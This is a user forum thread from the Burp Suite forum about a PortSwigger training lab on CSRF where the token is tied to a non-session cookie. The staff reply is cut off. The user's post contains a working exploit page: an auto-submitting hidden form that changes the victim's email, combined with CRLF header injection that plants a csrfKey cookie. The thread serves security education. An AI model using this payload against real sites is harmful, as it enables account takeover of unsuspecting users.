The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Deliver exploit to Victim does not solved the LAB - CSRF where token is tied to non-session cookie

german | Last updated: Aug 06, 2024 06:29AM UTC

I tried to solve this lab using the following solution: head: HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8; body: <form action="https://ID.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="test@victim.com" /> <input required="" type="hidden" name="csrf" value="crsf_value"> </form> <img src="ID.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=CSRF_KEY%3b%20SameSite=None" onerror="document.forms[0].submit()"> when i click "view exploit" the email is modified in the victim account, but when i store, change the email and click "Deliver exploit to Victim" the lab is not solved. Maybe i'm forgetting to add something to the payload?? Thanks!

Dominyque, PortSwigger Agent | Last updated: Aug 06, 2024 12:13PM UTC